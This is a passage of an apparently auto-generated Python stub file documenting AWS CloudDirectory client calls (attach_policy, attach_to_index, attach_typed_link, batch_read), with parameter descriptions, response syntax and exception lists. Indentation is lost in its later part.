    CloudDirectory.Client.exceptions.LimitExceededException
    CloudDirectory.Client.exceptions.AccessDeniedException
    CloudDirectory.Client.exceptions.DirectoryNotEnabledException
    CloudDirectory.Client.exceptions.ResourceNotFoundException
    CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
    CloudDirectory.Client.exceptions.InvalidAttachmentException
    CloudDirectory.Client.exceptions.ValidationException
    CloudDirectory.Client.exceptions.FacetValidationException
    :return: {
        'AttachedObjectIdentifier': 'string'
    }
    :returns:
    DirectoryArn (string) -- [REQUIRED]
    Amazon Resource Name (ARN) that is associated with the Directory where both objects reside. For more information, see arns .
    ParentReference (dict) -- [REQUIRED]
    The parent object reference.
    Selector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
    $ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
    /some/path - Identifies the object based on path
    #SomeBatchReference - Identifies the object in a batch call
    ChildReference (dict) -- [REQUIRED]
    The child object reference to be attached to the object.
    Selector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
    $ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
    /some/path - Identifies the object based on path
    #SomeBatchReference - Identifies the object in a batch call
    LinkName (string) -- [REQUIRED]
    The link name with which the child object is attached to the parent.
    """
    # Documentation-only stub (generated from the AWS CloudDirectory API);
    # the actual request is dispatched by the botocore client at runtime.
    pass
def attach_policy(DirectoryArn=None, PolicyReference=None, ObjectReference=None):
    """
    Attaches a policy object to a regular object. An object can have a limited number of attached policies.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.attach_policy(
        DirectoryArn='string',
        PolicyReference={
            'Selector': 'string'
        },
        ObjectReference={
            'Selector': 'string'
        }
    )
    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where both objects reside. For more information, see arns .\n
    :type PolicyReference: dict
    :param PolicyReference: [REQUIRED]\nThe reference that is associated with the policy object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED]\nThe reference that identifies the object to which the policy will be attached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {}
    Response Structure
    (dict) --
    Exceptions
    CloudDirectory.Client.exceptions.InternalServiceException
    CloudDirectory.Client.exceptions.InvalidArnException
    CloudDirectory.Client.exceptions.RetryableConflictException
    CloudDirectory.Client.exceptions.ValidationException
    CloudDirectory.Client.exceptions.LimitExceededException
    CloudDirectory.Client.exceptions.AccessDeniedException
    CloudDirectory.Client.exceptions.DirectoryNotEnabledException
    CloudDirectory.Client.exceptions.ResourceNotFoundException
    CloudDirectory.Client.exceptions.NotPolicyException
    :return: {}
    :returns:
    (dict) --
    """
    # Documentation-only stub (generated from the AWS CloudDirectory API);
    # the actual request is dispatched by the botocore client at runtime.
    pass
def attach_to_index(DirectoryArn=None, IndexReference=None, TargetReference=None):
    """
    Attaches the specified object to the specified index.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.attach_to_index(
        DirectoryArn='string',
        IndexReference={
            'Selector': 'string'
        },
        TargetReference={
            'Selector': 'string'
        }
    )
    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the directory where the object and index exist.\n
    :type IndexReference: dict
    :param IndexReference: [REQUIRED]\nA reference to the index that you are attaching the object to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
    :type TargetReference: dict
    :param TargetReference: [REQUIRED]\nA reference to the object that you are attaching to the index.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {
        'AttachedObjectIdentifier': 'string'
    }
    Response Structure
    (dict) --
    AttachedObjectIdentifier (string) --
    The ObjectIdentifier of the object that was attached to the index.
    Exceptions
    CloudDirectory.Client.exceptions.InternalServiceException
    CloudDirectory.Client.exceptions.InvalidArnException
    CloudDirectory.Client.exceptions.RetryableConflictException
    CloudDirectory.Client.exceptions.ValidationException
    CloudDirectory.Client.exceptions.LimitExceededException
    CloudDirectory.Client.exceptions.AccessDeniedException
    CloudDirectory.Client.exceptions.DirectoryNotEnabledException
    CloudDirectory.Client.exceptions.InvalidAttachmentException
    CloudDirectory.Client.exceptions.ResourceNotFoundException
    CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
    CloudDirectory.Client.exceptions.IndexedAttributeMissingException
    CloudDirectory.Client.exceptions.NotIndexException
    :return: {
        'AttachedObjectIdentifier': 'string'
    }
    :returns:
    CloudDirectory.Client.exceptions.InternalServiceException
    CloudDirectory.Client.exceptions.InvalidArnException
    CloudDirectory.Client.exceptions.RetryableConflictException
    CloudDirectory.Client.exceptions.ValidationException
    CloudDirectory.Client.exceptions.LimitExceededException
    CloudDirectory.Client.exceptions.AccessDeniedException
    CloudDirectory.Client.exceptions.DirectoryNotEnabledException
    CloudDirectory.Client.exceptions.InvalidAttachmentException
    CloudDirectory.Client.exceptions.ResourceNotFoundException
    CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
    CloudDirectory.Client.exceptions.IndexedAttributeMissingException
    CloudDirectory.Client.exceptions.NotIndexException
    """
    # Documentation-only stub (generated from the AWS CloudDirectory API);
    # the actual request is dispatched by the botocore client at runtime.
    pass
def attach_typed_link(DirectoryArn=None, SourceObjectReference=None, TargetObjectReference=None, TypedLinkFacet=None, Attributes=None):
    # NOTE(review): documentation stub only — the real implementation is provided
    # by the generated botocore client at runtime; this body is never executed.
    """
Attaches a typed link to a specified source and target object. For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.attach_typed_link(
DirectoryArn='string',
SourceObjectReference={
'Selector': 'string'
},
TargetObjectReference={
'Selector': 'string'
},
TypedLinkFacet={
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
Attributes=[
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the directory where you want to attach the typed link.\n
:type SourceObjectReference: dict
:param SourceObjectReference: [REQUIRED]\nIdentifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type TargetObjectReference: dict
:param TargetObjectReference: [REQUIRED]\nIdentifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type TypedLinkFacet: dict
:param TypedLinkFacet: [REQUIRED]\nIdentifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n
:type Attributes: list
:param Attributes: [REQUIRED]\nA set of attributes that are associated with the typed link.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
}
Response Structure
(dict) --
TypedLinkSpecifier (dict) --
Returns a typed link specifier as output.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
}
:returns:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
"""
pass
def batch_read(DirectoryArn=None, Operations=None, ConsistencyLevel=None):
"""
Performs all the read operations in a batch.
See also: AWS API Documentation
Exceptions
:example: response = client.batch_read(
DirectoryArn='string',
Operations=[
{
'ListObjectAttributes': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123,
'FacetFilter': {
'SchemaArn': 'string',
'FacetName': 'string'
}
},
'ListObjectChildren': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListAttachedIndices': {
'TargetReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListObjectParentPaths': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'GetObjectInformation': {
'ObjectReference': {
'Selector': 'string'
}
},
'GetObjectAttributes': {
'ObjectReference': {
'Selector': 'string'
},
'SchemaFacet': {
'SchemaArn': 'string',
'FacetName': 'string'
},
'AttributeNames': [
'string',
]
},
'ListObjectParents': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListObjectPolicies': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListPolicyAttachments': {
'PolicyReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'LookupPolicy': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListIndex': {
'RangesOnIndexedValues': [
{
'AttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Range': {
'StartMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'StartValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'EndMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'EndValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
],
'IndexReference': {
'Selector': 'string'
},
'MaxResults': 123,
'NextToken': 'string'
},
'ListOutgoingTypedLinks': {
'ObjectReference': {
'Selector': 'string'
},
'FilterAttributeRanges': [
{
'AttributeName': 'string',
'Range': {
'StartMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'StartValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'EndMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'EndValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
],
'FilterTypedLink': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListIncomingTypedLinks': {
'ObjectReference': {
'Selector': 'string'
},
'FilterAttributeRanges': [
{
'AttributeName': 'string',
'Range': {
'StartMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'StartValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'EndMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'EndValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
],
'FilterTypedLink': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'GetLinkAttributes': {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'AttributeNames': [
'string',
]
}
},
],
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory . For more information, see arns .\n
:type Operations: list
:param Operations: [REQUIRED]\nA list of operations that are part of the batch.\n\n(dict) --Represents the output of a BatchRead operation.\n\nListObjectAttributes (dict) --Lists all attributes that are associated with an object.\n\nObjectReference (dict) -- [REQUIRED]Reference of the object whose attributes need to be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of items to be retrieved in a single call. This is an approximate number.\n\nFacetFilter (dict) --Used to filter the list of object attributes that are associated with a certain facet.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. 
See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\n\n\nListObjectChildren (dict) --Returns a paginated list of child objects that are associated with a given object.\n\nObjectReference (dict) -- [REQUIRED]Reference of the object for which child objects are being listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --Maximum number of items to be retrieved in a single call. This is an approximate number.\n\n\n\nListAttachedIndices (dict) --Lists indices attached to an object.\n\nTargetReference (dict) -- [REQUIRED]A reference to the object that has indices attached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . 
You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nListObjectParentPaths (dict) --Retrieves all available parent paths for any object type such as node, leaf node, policy node, and index node objects. For more information about objects, see Directory Structure .\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. 
An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nGetObjectInformation (dict) --Retrieves metadata about an object.\n\nObjectReference (dict) -- [REQUIRED]A reference to the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nGetObjectAttributes (dict) --Retrieves attributes within a facet that are associated with an object.\n\nObjectReference (dict) -- [REQUIRED]Reference that identifies the object whose attributes will be retrieved.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . 
You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nSchemaFacet (dict) -- [REQUIRED]Identifier for the facet whose attributes will be retrieved. See SchemaFacet for details.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\nAttributeNames (list) -- [REQUIRED]List of attribute names whose values will be retrieved.\n\n(string) --\n\n\n\n\nListObjectParents (dict) --\nObjectReference (dict) -- [REQUIRED]The reference that identifies an object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. 
An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --\nMaxResults (integer) --\n\n\nListObjectPolicies (dict) --Returns policies attached to an object in pagination fashion.\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nListPolicyAttachments (dict) --Returns all of the ObjectIdentifiers to which a given policy is attached.\n\nPolicyReference (dict) -- [REQUIRED]The reference that identifies the policy object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . 
You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nLookupPolicy (dict) --Lists all policies from the root of the Directory to the object specified. If there are no policies present, an empty list is returned. If policies are present, and if some objects don\'t have the policies attached, it returns the ObjectIdentifier for such objects. If policies are present, it returns ObjectIdentifier , policyId , and policyType . Paths that don\'t lead to the root from the target object are ignored. For more information, see Policies .\n\nObjectReference (dict) -- [REQUIRED]Reference that identifies the object whose policies will be looked up.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. 
An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nListIndex (dict) --Lists objects attached to the specified index.\n\nRangesOnIndexedValues (list) --Specifies the ranges of indexed values that you want to query.\n\n(dict) --A range of attributes.\n\nAttributeKey (dict) --The key of the attribute that the attribute range covers.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nRange (dict) --The range of attribute values being selected.\n\nStartMode (string) -- [REQUIRED]The inclusive or exclusive range start.\n\nStartValue (dict) --The value to start the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nEndMode (string) -- [REQUIRED]The inclusive or exclusive range end.\n\nEndValue (dict) --The attribute value to terminate the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nIndexReference (dict) -- [REQUIRED]The reference to the index to list.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. 
Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\nNextToken (string) --The pagination token.\n\n\n\nListOutgoingTypedLinks (dict) --Returns a paginated list of all the outgoing TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. 
